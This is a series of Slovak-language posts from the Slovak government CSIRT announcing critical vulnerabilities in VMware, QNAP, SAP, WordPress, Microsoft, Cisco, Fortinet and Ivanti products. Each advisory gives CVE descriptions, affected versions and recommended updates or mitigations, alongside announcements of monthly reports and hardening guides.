Bezodkladná aktualizácia ESXi na verziu ESXi80U2sb-23305545, ESXi80U1d-23299997, ESXi70U3p-23307199, Workstation na verziu 17.5.1 a Fusion na verziu 13.5.1.

VMware vydala opravy aj na staršie versie ESXi: 6.7U3u, 6.5U3v, VCF 3.x.

Ak nemôžete aktualizovať svoje zariadenia, VJ CSIRT odporúča pre zmiernenie problémov odstrániť radiče USB z virtuálnych počítačov podľa pokynov výrobcu.

Odkazy:

https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-sandbox-escape-flaws-in-esxi-workstation-and-fusion/

https://thehackernews.com/2024/03/vmware-issues-security-patches-for-esxi.html

https://nvd.nist.gov/vuln/detail/CVE-2024-22252

https://nvd.nist.gov/vuln/detail/CVE-2024-22253

https://nvd.nist.gov/vuln/detail/CVE-2024-22254

https://nvd.nist.gov/vuln/detail/CVE-2024-22255

https://www.vmware.com/security/advisories/VMSA-2024-0006.html

Zraniteľnosti v produktoch NAS

Marian Danko — Fri, 15 Mar 2024 11:54:29 +0000

Spoločnosť QNAP poukázala na bezpečnostné chyby vo svojich softvérových produktoch NAS vrátane QTS, QuTS hero, QuTScloud a myQNAPcloud, ktoré by mohli autentifikovanému útočníkovi umožniť prístup k zariadeniam. Kritické zraniteľnosti umožňujú obídenie autentifikácie, injektovanie príkazov a injekciu SQL. Zraniteľnosti sa nachádzajú na viac ako 3 miliónoch zariadení, ktoré majú prístup na internet.

Zraniteľné systémy:

QTS 5.1.x
QTS 4.5.x
QuTS hero h5.1.x
QuTS hero h4.5.x
QuTScloud c5.x
myQNAPcloud 1.0.x

Opis činnosti:

CVE-2023-45025 (CVSS skóre 9,0) a CVE-2023-39297 (CVSS skóre 8,8)

Kritické zraniteľnosti CVE-2023-45025 a CVE-2023-39297 sa nachádzajú v operačnom systéme QNAP a umožňujú útočníkovi vykonávanie príkazov. V prípade CVE-2023-39297 je potrebná autentifikácia útočníka.

CVE-2024-21899 (CVSS skóre 9,8), CVE-2024-21900 (CVSS skóre 4,3) a CVE-2024-21901 (CVSS skóre 4,7)

Zraniteľnosti CVE-2024-21899, CVE-2024-21900 a CVE-2024-21901 sa nachádzajú v operačnom systéme QNAP. Úspešné zneužitie CVE-2024-21900 a CVE-2024-21901 umožňuje vzdialenému autentifikovanému útočníkovi vykonávať a injektovať škodlivé príkazy. Chyba CVE-2024-21899 sa týka nesprávneho overovania a môže viesť ku kompromitácii zabezpečenia systému.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie príkazov
Injektovanie kódu
Narušenie integrity

Odporúčania:

Odporúčame bezodkladnú aktualizáciu na verzie:

QTS 5.1.3.2578 build 20231110 (opravuje CVE-2023-45025 a CVE-2023-39297)
QTS 4.5.4.2627 build 20231225 (opravuje CVE-2023-45025 a CVE-2023-39297)
QTS 5.0.1.2273 build 20240314 (opravuje CVE-2024-21899, CVE-2024-21900 a CVE-2024-21901)
QuTS hero h5.1.3.2578 build 20231110 (opravuje CVE-2023-45025 a CVE-2023-39297)
QuTS hero h4.5.4.2626 build 20231225 (opravuje CVE-2023-45025 a CVE-2023-39297)
QuTScloud c5.0.1.2273 build 20240314 (opravuje CVE-2024-21899, CVE-2024-21900 a CVE-2024-21901)
myQNAPcloud 1.0.52

Odkazy:

https://nvd.nist.gov/vuln/detail/CVE-2024-21899

https://www.securityweek.com/critical-vulnerability-allows-access-to-qnap-nas-devices/

https://www.bleepingcomputer.com/news/security/qnap-warns-of-critical-auth-bypass-flaw-in-its-nas-devices/

https://www.qnap.com/en/security-advisory/qsa-24-09

https://www.qnap.com/en/security-advisory/qsa-23-47

https://nvd.nist.gov/vuln/detail/CVE-2023-45025

https://nvd.nist.gov/vuln/detail/CVE-2023-39297

https://borncity.com/win/2024/03/12/critical-vulnerability-cve-2024-21899-allows-qnap-nas-access-without-authentication/

https://www.qnap.com/en/security-advisories

https://threatprotect.qualys.com/2024/03/11/qnap-patches-critical-vulnerabilities-impacting-nas-devices-cve-2024-21899-cve-2024-21900-cve-2024-21901/

Kritické zraniteľnosti v produktoch SAP

Marian Danko — Fri, 15 Mar 2024 11:52:19 +0000

Spoločnosť SAP vydala v marci 2024 balík opráv pre svoje produkty opravujúcich 10 zraniteľností v aplikáciách Business Client, Build Apps, NetWeaver AS Java a ďalších. 2 z nich sú označené ako kritické. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií.

Zraniteľné systémy:

SAP NetWeaver Administrator AS Java- verzia 7.5
Business Client
Build Apps- všetky verzie pred verziou 4.9.145

Opis činnosti:

CVE-2024-22127 (CVSS skóre 9,1)

Zraniteľnosť CVE-2024-22127 sa nachádza v rozšírení Log Viewer v aplikácii SAP NetWeaver Administrator AS Java. Chyba umožňuje útočníkovi s vysokými privilégiami nahrávať ľubovoľné súbory, a následne injektovať škodlivé príkazy do systému.

CVE-2019-10744 (CVSS skóre 9,1)

Kritická zraniteľnosť CVE-2019-10744 bola objavená v knižnici lodash, ktorá je používaná v aplikácii Build Apps. Úspešné zneužitie umožňuje neoprávnené vykonávanie príkazov.

Spoločnosť SAP opravila celkovo 29 bezpečnostných chýb, z toho 15 dostalo označenie ako vysoko závažné a 2 chyby sú kritické.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Injektovanie škodlivého kódu
Neoprávnené vykonávanie príkazov

Odporúčania:

Bezodkladná aktualizácia aplikácie Build Apps na verziu 4.9.145.

Pre zmiernenie zraniteľnosti CVE-2024-22127 odporúčame pristupovať k NetWeaver Administrator pomocou používateľskej roly ‘NWA_READONLY’ namiesto používateľskej roly ‘Administrators’. Viac informácií o zmiernení zraniteľnosti tu.

Odkazy:

https://nvd.nist.gov/vuln/detail/cve-2019-10744

https://nvd.nist.gov/vuln/detail/CVE-2024-22127

https://www.securityweek.com/sap-patches-critical-command-injection-vulnerabilities/

https://www.cve.org/CVERecord?id=CVE-2024-22127

https://pathlock.com/navigating-sap-security-notes-march-2024-patch-tuesday/

Členovia VJ CSIRT prezentovali systém Achilles na medzinárodnej konferencii

Marian Danko — Wed, 13 Mar 2024 12:57:48 +0000

Členovia vládnej jednotky CSIRT sa zúčastnili medzinárodnej konferencie Open Cyber Security Conference 2024, ktorá sa konala na ostrove Tenerife. Počas konferencie prezentovali systém Achilles, ktorý jednotka vyvíja a ktorý slúži na skenovanie a spracovávanie informácií o zraniteľnostiach týkajúcich sa verejných inštitúcií.

Medzinárodná konferencia Open Cyber Security Conference (OCSC) sa konala na Kanárskych ostrovoch v dňoch 26. februára až 1. marca 2024. Počas piatich dní sa na nej uskutočnilo množstvo vysoko odborných prednášok, ktorých sa zúčastnili experti v oblasti kybernetickej bezpečnosti z celej Európy, Spojených štátov amerických alebo Japonska.

Členovia VJ CSIRT boli pozvaní predstaviť na konferencii svoj vlastný systém Achilles. Ten skenuje a spracováva informácie o zraniteľnostiach organizácií v konštituencii VJ CSIRT a následne informuje kontrolované inštitúcie o týchto zraniteľnostiach. Vďaka nemu jednotka poskytuje bezplatnú službu monitoringu zraniteľností do internetu vystavených systémov organizácií v sektore ITVS. Viac informácií o systéme Achilles nájdete tu. Prezentácia sa stretla s veľkým záujmom účastníkov a VJ CSIRT za ňu získala cenné pozitívne ohlasy.

Okrem prezentácie systému Achilles sa členovia VJ CSIRT zúčastnili aj na rôznych workshopoch a prednáškach, ktoré im pomohli rozšíriť si svoje znalosti a zručnosti v oblasti kybernetickej bezpečnosti.

Program konferencie zahŕňal viacero noviniek v oblastiach:

Aktuálne trendy kybernetických hrozieb
Ochrana kritickej infraštruktúry
Kybernetická bezpečnosť v prostredí Cloudu
Forenzná analýza kybernetických bezpečnostných incidentov

Cieľom konferencie bolo nadväzovanie a budovanie prospešných vzťahov medzi rôznymi aktérmi v oblasti kybernetickej bezpečnosti, ako sú štátne orgány, súkromné firmy alebo akademická sféra. Vďaka tomu dochádza k efektívnejšiemu zdieľaniu informácií a osvedčených postupov, ako aj koordináciu reakcií na kybernetické hrozby. Okrem nadväzovania kontaktov sa VJ CSIRT podarilo na konferencii získať nové poznatky a zručnosti v oblasti kybernetickej bezpečnosti a zvýšiť povedomie o VJ CSIRT a jej aktivitách.

Mesačný prehľad kritických zraniteľností február 2024

Marian Danko — Wed, 06 Mar 2024 08:49:05 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2024.

Mesačný prehľad – 02/2024 PDF (264 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Mesačná správa CSIRT.SK – Február 2024

Marian Danko — Tue, 05 Mar 2024 07:34:46 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. Z kapacitných dôvodov však dočasne uverejňujeme skrátenú verziu správy, ktorá obsahuje prehľad z činnosti vládnej jednoty CSIRT a obsah mesačného prehľadu zraniteľností.

Mesačná správa – 02/2024 PDF (309 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Mesačná správa CSIRT.SK – Január 2024

Marian Danko — Tue, 05 Mar 2024 07:32:09 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 01/2024 PDF (314 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Kritická zraniteľnosť v doplnku WordPress

Marian Danko — Mon, 04 Mar 2024 07:49:39 +0000

Obľúbená platforma na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQLi, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy do existujúcich dotazov SQL. To môže viesť k neoprávnenému prístupu k citlivým informáciám. Chyba sa nachádza v populárnom doplnku WordPress s názvom Ultimate Member, ktorý má viac ako 200 000 aktívnych inštalácií.

Zraniteľné systémy:

Ultimate Member 2.1.3 – 2.8.2

Opis činnosti:

CVE-2024-1071 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-1071 typu SQLi sa nachádza v doplnku platformy WordPress s názvom Ultimate Member. Chyba sa týka nedostatočného ošetrenia parametra zadaného používateľom, čo umožňuje pripojiť ďalšie dotazy do predpripravených dotazov SQL. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi neoprávnený prístup k citlivým informáciám pomocou injektovania SQL príkazov. Pre získanie citlivých informácií by útočník musel použiť prístup do databázy Time-Based blind. Na chybu poukázal bezpečnostný výskumník Christiaan Swiers.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Prístup k citlivým informáciám

Odporúčania:

Bezodkladná aktualizácia zásuvného modelu Ultimate Member aspoň na verziu 2.8.3. VJ CSIRT odporúča vykonať bezpečnostnú kontrolu svojej WordPress stránky, či nedošlo k neoprávnenému prístupu alebo zmenám.

Chyba sa týka len používateľov, ktorí v nastaveniach doplnku zaškrtli možnosť “Enable custom table for usermeta” (Povoliť vlastnú tabuľku pre usermeta).

Odkazy:

https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html

https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/

https://op-c.net/blog/urgent-security-alert-sql-injection-vulnerability-in-wordpress-ultimate-member-plugin-cve-2024-1071/

Viacfaktorová autentifikácia (MFA) [Infografika]

Marian Danko — Tue, 27 Feb 2024 12:19:57 +0000

Viete čo je to viacfaktorová autentifikácia a poznáte jej výhody? Prinášame Vám jej stručné vysvetlenie a dôvody, prečo je pre Vás výhodné ju používať všade, kde je to možné.

Výhody Viacfaktorovej Autentifikácie (MFA):

Zvýšená bezpečnosť: MFA výrazne zvyšuje zabezpečenie Vašich účtov pred neoprávneným vstupom útočníka.
Ochrana pred phishingom: Aj keď používateľ poskytne svoje heslo pri phishingovej kampani, útočníkovi sa nepodarí získať prístup bez ďalších autentifikačných faktorov.
Užívateľsky prívetivé: MFA môže byť pohodlná, bezpečná a flexibilná cesta pre overenie používateľa, najmä metódou biometrického overenia alebo push notifikáciami.

Návod: WordPress hardening manuál

Marian Danko — Tue, 27 Feb 2024 07:40:45 +0000

CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zabezpečenie Vašej webstránky postavenej na platforme WordPress.

WordPress hardening manuál (03-2024)

Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zraniteľnosti

Marian Danko — Tue, 27 Feb 2024 07:40:24 +0000

Spoločnosť Microsoft vydala vo februári 2024 balík opráv pre operačné systémy Windows opravujúcich 73 zraniteľností, 5 z nich dostalo hodnotenie kritická. Dve zraniteľnosti sú typu zero-day.

Zraniteľné systémy:

Windows 10 Version 1809 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 10 Version 1809 for x64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows Server 2022
Windows 11 version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows 11 Version 22H2 for ARM64-based Systems
Microsoft Exchange Server 2019 Cumulative Update 14, 13
Microsoft Exchange Server 2016 Cumulative Update 23
Microsoft Office 2016

Opis činnosti:

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 73 zraniteľností, z toho 5 kritických a 2 zero-day. Najzávažnejšie zraniteľnosti umožňujú eskaláciu oprávnení, vykonávanie kódu, únik informácií, či obchádzanie bezpečnostných prvkov. Zraniteľnosti CVE-2024-21413, CVE-2024-21410 a CVE-2024-21412 sú aktívne zneužívané.

CVE-2024-21413 (CVSS skóre 9,8 )

Kritická zraniteľnosť s verejne dostupným exploitom sa nachádza v e-mailovom klientovi Outlook a umožňuje vzdialené vykonávanie kódu. Chyba sa týka nesprávneho parsovania odkazov cez protokol file:// a umožňuje vytvoriť škodlivý odkaz, ktorý obchádza funkciu Protected View Protocol, čo môže viesť k úniku informácií o lokálnych povereniach NTLM a vzdialenému vykonávaniu kódu (RCE). Úspešné zneužitie umožňuje útočníkovi získať vysoké oprávnenia ktoré zahŕňajú funkcie čítania, zápisu a mazania.

CVE-2024-21410 (CVSS skóre 9,8 )

Kritická zraniteľnosť CVE-2024-21410 sa nachádza na serveri Microsoft Exchange a umožňuje zvýšenie privilégií. Úspešné zneužitie chyby by mohlo vzdialenému neautentifikovanému útočníkovi umožniť získať overovaciu správu NTLM a odovzdať uniknutý hash Net-NTLMv2 používateľa pre overenie na serveri Exchange ako legitímny používateľ.

CVE-2024-21412 (CVSS skóre 8,1 )

Vysoko závažná zraniteľnosť CVE-2024-21412 sa nachádza vo funkcii súborov internetových skratiek (LNK súbory) a umožňuje získať neoprávnený prístup k citlivým informáciám a prevziať kontrolu nad zariadením. Neautentifikovaný útočník má možnosť odoslať špeciálne vytvorený súbor pre obídenie bezpečnostnej kontroly. Pre úspešné zneužitie je nevyhnutná interakcia zo strany obete.

Spoločnosť Microsoft tiež vyzvala správcov systému Windows, aby venovali pozornosť chybe CVE-2024-21351 umožňujúcej obchádzanie bezpečnostných funkcií, ktorá je zneužívaná pri útokoch.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Eskalácia privilégií
Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná inštalácia príslušného opravného balíka pre Vašu verziu Microsoft Outlook. Dôrazne odporúčame stiahnuť najnovšiu aktualizáciu zabezpečenia pre Exchange Server 2016, pomocou skriptu ExchangeExtendedProtectionManagement.ps1 zapnete rozšírenú ochranu pre overovanie (EPA) pre servery Exchange.

Odkazy:

https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html

https://www.securityweek.com/microsoft-confirms-windows-exploits-bypassing-security-features/

https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html

https://nvd.nist.gov/vuln/detail/CVE-2024-21410

https://nvd.nist.gov/vuln/detail/CVE-2024-21412

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413

https://nvd.nist.gov/vuln/detail/CVE-2024-21413

Návod: Apache hardening manuál

Marian Danko — Tue, 27 Feb 2024 07:35:55 +0000

CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zvýšenie zabezpečenia Vašej inštancie webového servera Apache.

Apache hardening manuál (03-2024)

Zraniteľnosti v Cisco

Marian Danko — Tue, 27 Feb 2024 07:24:06 +0000

Spoločnosť Cisco poukázala na bezpečnostné chyby vo viacerých svojich produktoch. Tieto chyby umožňujú vzdialenému útočníkovi vykonávanie ľubovoľných príkazov a zvýšenie privilégií na úroveň root.

Zraniteľné systémy:

Cisco Unity Connection- 12.5 a staršie, 14
Cisco WAP371
Unified Communications Manager 11.5, 12.5, 14
Unified Communications Manager IM & Presence Service 11.5, 12.5, 14
Unified Communications Manager Session Management Edition 11.5, 12.5, 14
Unified Contact Center Express 12.0 a staršie 12.5
Unity Connection 11.5, 12.5, 14
Virtualized Voice Browser 12.0 a staršie , 12.5, 12.5

Opis činnosti:

CVE-2024-20253 (CVSS skóre 9,9)

Kritická zraniteľnosť CVE-2024-20253 sa nachádza v produktoch Unified Communications a Contact Center Solutions. Úspešné zneužitie umožňuje neoverenému vzdialenému útočníkovi vykonávať ľubovoľné príkazy s oprávneniami používateľa webových služieb. Chyba sa týka nesprávneho parsovania údajov od používateľa pri čítaní do pamäte. Útočníkovi dovoľuje vykonať kód odoslaním špeciálne vytvorenej správy na počúvajúci port zariadenia.

CVE-2024-20272 (CVSS skóre 7,3)

Vysoko závažná zraniteľnosť CVE-2024-20272 sa týka nedostatočnej autentifikácie v rozhraní API vo webovom rozhraní pre správu softvéru služby Unity Connection. Chyba umožňuje vzdialenému neautentifikovanému útočníkovi nahrať škodlivý súbor do zraniteľného systému. Úspešné zneužitie umožňuje tiež vykonať ľubovoľné príkazy a zvýšiť oprávnenia na úroveň root.

CVE-2024-20287 (CVSS skóre 6,5)

Zraniteľnosť CVE-2024-20287 sa nachádza v prístupovom bode Cisco WAP37 a umožňuje ľubovoľné vykonávanie príkazov s oprávneniami root. Pre úspešné zneužitie chyby sú potrebné administrátorské oprávnenia.

Spoločnosť Cisco uvádza, že aktualizácie firmvéru na opravu bezpečnostnej chyby CVE-2024-20287 nevydá, pretože zariadenie Cisco WAP371 dosiahlo koniec životnosti v júni 2019. Cisco nemá v úmysle vydať opravu pre chybu injektovania príkazov v zariadení WAP371 pričom uviedla, že toto zariadenie dosiahlo koniec životnosti (EoL) v júni 2019. Spoločnosť Cisco dodala aj aktualizácie na riešenie 11 stredne závažných zraniteľností, ktoré pokrývajú jej softvér vrátane Identity Services Engine, bezdrôtového prístupového bodu WAP371, ThousandEyes Enterprise Agent a TelePresence Management Suite (TMS).

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Vykonávanie ľubovoľných príkazov
Zvyšovanie privilégií

Odporúčania:

Bezodkladná aktualizácia verzie 12.5 a starších verzií na 12.5.1.19017-4, verzie 14 na verziu 14.0.1.14006-5.

Pre zmiernenie zraniteľnosti CVE-2024-20253 odporúčame nastaviť zoznamy riadenia prístupu (ACL), ktoré oddeľujú klastre produktov od používateľov a siete. Tieto zoznamy ACL by mali udeľovať prístup len k portom, kde sú nasadené služby.

Spoločnosť Cisco odporúča migráciu zákazníkom, ktorí majú vo svojej sieti zariadenie WAP371, na prístupový bod Cisco Business 240AC.

Odkazy:

https://thehackernews.com/2024/01/cisco-fixes-high-risk-vulnerability.html

https://www.bleepingcomputer.com/news/security/cisco-says-critical-unity-connection-bug-lets-attackers-get-root/

https://thehackernews.com/2024/01/critical-cisco-flaw-lets-hackers.html

https://socradar.io/critical-rce-vulnerability-in-cisco-unified-communications-with-risk-of-root-access-cve-2024-20253/

https://nvd.nist.gov/vuln/detail/CVE-2024-20272

https://nvd.nist.gov/vuln/detail/CVE-2024-20287

https://nvd.nist.gov/vuln/detail/CVE-2024-20253

Návod: Príručka zameraná na hardening operačného systému Microsoft Windows 11.

Marian Danko — Tue, 20 Feb 2024 15:40:05 +0000

CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie nastaveniami pre zabezpečenie, resp. hardening operačného systému Windows 11.

Príručka zameraná na hardening operačného systému Microsoft Windows 11.
HardeningGuideWindows11 PDF (899 kB)

Mesačný prehľad kritických zraniteľností január 2024

Marian Danko — Mon, 19 Feb 2024 15:24:01 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2024.

Mesačný prehľad – 01/2024 PDF (278 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Mesačná správa CSIRT.SK – December 2023

Marian Danko — Mon, 19 Feb 2024 15:22:11 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2023. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 12/2023 PDF (314 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Aktívne zneužívaná kritická zraniteľnosť FortiOS SSL VPN

Marian Danko — Fri, 09 Feb 2024 09:28:29 +0000

Spoločnosť Fortinet vydala varovanie pred dvoma kritickými zraniteľnosťami. Obe kritické RCE zraniteľnosti umožňujú neautentifikovanému útočníkovi ľubovoľné vykonávanie kódu alebo príkazovprostredníctvom špeciálne vytvorených HTTP požiadaviek. Zraniteľnosť CVE-2024-21762 je aktívne zneužívaná.

VJ CSIRT odporúča bezodkladne aktualizovať zraniteľné produkty Fortinet. Pokiaľ nie je možné vykonať aktualizáciu, nie je bezpečné využívať službu SSL VPN.

Zraniteľné systémy:

FortiOS 7.4 (7.4.0 – 7.4.2)
FortiOS 7.2 (7.2.0 – 7.2.6)
FortiOS 7.0 (7.0.0 – 7.0.13)
FortiOS 6.4 (6.4.0 – 6.4.14)
FortiOS 6.2 (6.2.0 – 6.2.15)
FortiOS 6.0

Opis činnosti:

CVE-2024-21762 (CVSS skóre 9,6)

Kritická zraniteľnosť CVE-2024-21762 sa nachádza v komponente sslvpnd a umožňuje zapisovať mimo povolené hodnoty vyrovnávacej pamäte. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi ľubovoľné vykonávanie kódu alebo príkazov prostredníctvom špeciálne vytvorených HTTP požiadaviek. Útočník má možnosť zapisovať údaje pred začiatok alebo za koniec vyrovnávacej pamäte.

Pre zraniteľnosť nie je vydaná dočasná mitigácia, zakázanie webového režimu VPN zraniteľnosť nerieši.

Zraniteľnosť CVE-2024-21762 môže byť aktívne zneužívaná.

CVE-2024-23113 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-23113 sa nachádza v komponente fgfmd (fortigate/fortimanager communication daemon). Ide o bug formátovania reťazca z požiadavky. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi vykonávanie ľubovoľného kódu alebo príkazov prostredníctvom špeciálne vytvorených HTTP požiadaviek.

Podľa nedávnej správy od spoločnosti Fortinet sa na zraniteľnosti ich produktov zameriava Čínska, štátom sponzorovaná skupina Volt Typhoon.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie ľubovoľného kódu
Kompromitácia bezpečnostných sieťových prvkov

Odporúčania:

Pokiaľ nemôžete aktualizovať, pre zmiernenie zraniteľnosti CVE-2024-21762 odporúčame vypnúť SSL VPN v zariadeniach Fortinet. (Pre zraniteľnosť nie je vydaná dočasná mitigácia, zakázanie webového režimu VPN zraniteľnosť nerieši.)

Bezodkladná aktualizácia verzie:

Verzia Zraniteľné Opravená verzia

FortiOS 7.6 nie je zraniteľná –

FortiOS 7.4 7.4.0 – 7.4.2 Upgrade na 7.4.3 alebo novšiu

FortiOS 7.2 7.2.0 – 7.2.6 Upgrade na 7.2.7 alebo novšiu

FortiOS 7.0 7.0.0 – 7.0.13 Upgrade na 7.0.14 alebo novšiu

FortiOS 6.4 6.4.0 – 6.4.14 Upgrade na 6.4.15 alebo novšiu

FortiOS 6.2 6.2.0 – 6.2.15 Upgrade na 6.2.16 alebo novšiu

FortiOS 6.0 všetky verzie Potrebný upgrade na vyššiu verziu

Odkazy:

Ďalšia zero-day zraniteľnosť v produktoch Ivanti

Marian Danko — Tue, 06 Feb 2024 13:39:34 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre dve kritické zraniteľnosti v produktoch Connect Secure, Policy Secure a Neurons. Zero-day zraniteľnosť CVE-2024-21893 je aktívne zneužívaná čínskou špionážnou skupinou UTA0178/UNC5221 na inštaláciu webového shellu a zadných vrátok na zraniteľných zariadeniach.

Zraniteľné systémy:

Ivanti Connect Secure 21.12, 21.9, 22.1, 22.2, 22.3, 22.4, 22.6, 9.0, 9.1
Ivanti Policy Secure 22.1, 22.2, 22.3, 22.4, 22.5, 22.6, 9.0, 9.1
Ivanti Neurons for ZTA

Opis činnosti:

CVE-2024-21888 (CVSS skóre 8,8)

Závažná zraniteľnosť CVE-2024-21888 sa nachádza vo webovej súčasti Connect Secure a Policy Secure. Úspešné zneužitie zraniteľnosti umožňuje útočníkovi zvýšiť oprávnenia na úroveň administrátora.

CVE-2024-21893 (CVSS skóre 8,2)

Zero-day zraniteľnosť CVE-2024-21893 je chyba umožňujúca falšovanie požiadaviek na strane servera SSRF (Server Side Request Forgery) v komponente SAML (Security Assertion Markup Language). Úspešné zneužitie umožňuje útočníkovi neautentifikovaný prístup k obmedzeným zdrojom na zraniteľných zariadeniach.

Zraniteľnosť CVE-2024-21893 je aktívne zneužívaná čínskou špionážnou skupinou UTA0178/UNC5221 na inštaláciu webového shellu a zadných vrátok.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Eskalácia privilégií
Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia na verziu:
Ivanti Connect Secure (verzie 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 a 22.5R2.2)
Ivanti Policy Secure verzia 22.5R1.1 a
Ivanti Neurons for ZTA verzia 22.6R1.3.

Pokiaľ nemôžete použiť aktualizáciu, zraniteľnosti je možné dočasne mitigovať importovaním súboru mitigation.release.20240107.1.xml prostredníctvom portálu na stiahnutie. Konkrétny postup nájdete tu.

Spoločnosť CISA odporúča federálnym agentúram odpojiť všetky zariadenia Ivanti Connect Secure a Policy Secure VPN. Do siete by sa mali opätovne pripojiť len zariadenia, ktoré boli obnovené do továrenského stavu a aktualizované na najnovšiu verziu firmvéru.

Odkazy:

Kritická a zero-day zraniteľnosť v produktoch VMware

Marian Danko — Mon, 05 Feb 2024 10:38:49 +0000

Spoločnosť CISA poukázala na aktívne zneužívanú kritickú zraniteľnosť (CVE-2023-34063), ktorá sa týka chýbajúcej kontroly prístupu a umožňuje získať neoprávnený prístup k vzdialeným organizáciam. Výskumník spoločnosti Trend Micro upozornil na zero-day zraniteľnosť (CVE-2023-34048) v produktoch VMware. Zneužitie zraniteľnosti umožňuje autentifikovanému útočníkovi vzdialené vykonávanie kódu. V súčasnosti je vystavených viac ako 2 000 serverov VMware Center týmto zraniteľnostiam.

Zraniteľné systémy:

VMware Aria Automation (8.11.x, 8.12.x, 8.13.x a 8.14.x) (CVE-2023-34063)
VMware Cloud Foundation (4.x, 5.x)
VMware vCenter Server 7.0, 8.0 (CVE-2023-34048, CVE-2023-34056)

Opis činnosti:

CVE-2023-34048 (CVSS skóre 9,8) a CVE-2023-34056 (CVSS skóre 4,3)

Kritická zraniteľnosť CVE-2023-34048 a CVE-2023-34056 sa nachádzajú v serveri vCenter. Chyba CVE -2023-34048 sa týka zapisovania mimo povolené hodnoty pamäte v implementácii protokolu DCE/RPC a umožňuje neoprávnený prístup k údajom. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi so sieťovým prístupom ku zraniteľnej inštancii vCenter Server vzdialené vykonávanie kódu.

CVE-2023-34063 (CVSS skóre 9,9)

Kritická zraniteľnosť CVE-2023-34063 sa nachádza v aplikácii Aria Automation a Cloud Foundation a týka sa chýbajúcej kontroly prístupu. Úspešné zneužitie umožňuje autentifikovanému útočníkovi získať neopravený prístup k vzdialeným organizáciám a workflowom.

Zraniteľnosti CVE-2023-34048 a CVE-2023-34063 sú aktívne zneužívané.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Narušenie integrity a dostupnosti systému
Vzdialené vykonávanie kódu
Možný únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia aplikácie Aria Automation na verziu 8.16, pre zmiernenie chyby CVE-2023-34063. Vzhľadom na to, že neexistuje mitigácia zraniteľnosti CVE-2023-34048, odporúčame dôsledne monitorovať konkrétne sieťové porty 2012/tcp, 2014/tcp a 2020/tcp.

Opravené verzie:

VMware vCenter Server 8.0 na 8.0U2
VMware vCenter Server 8.0 na 8.0U1d
VMware vCenter Server 7.0 na 7.0U3o
VMware Cloud Foundation 5.x, 4.x podľa KB88287

Odkazy:

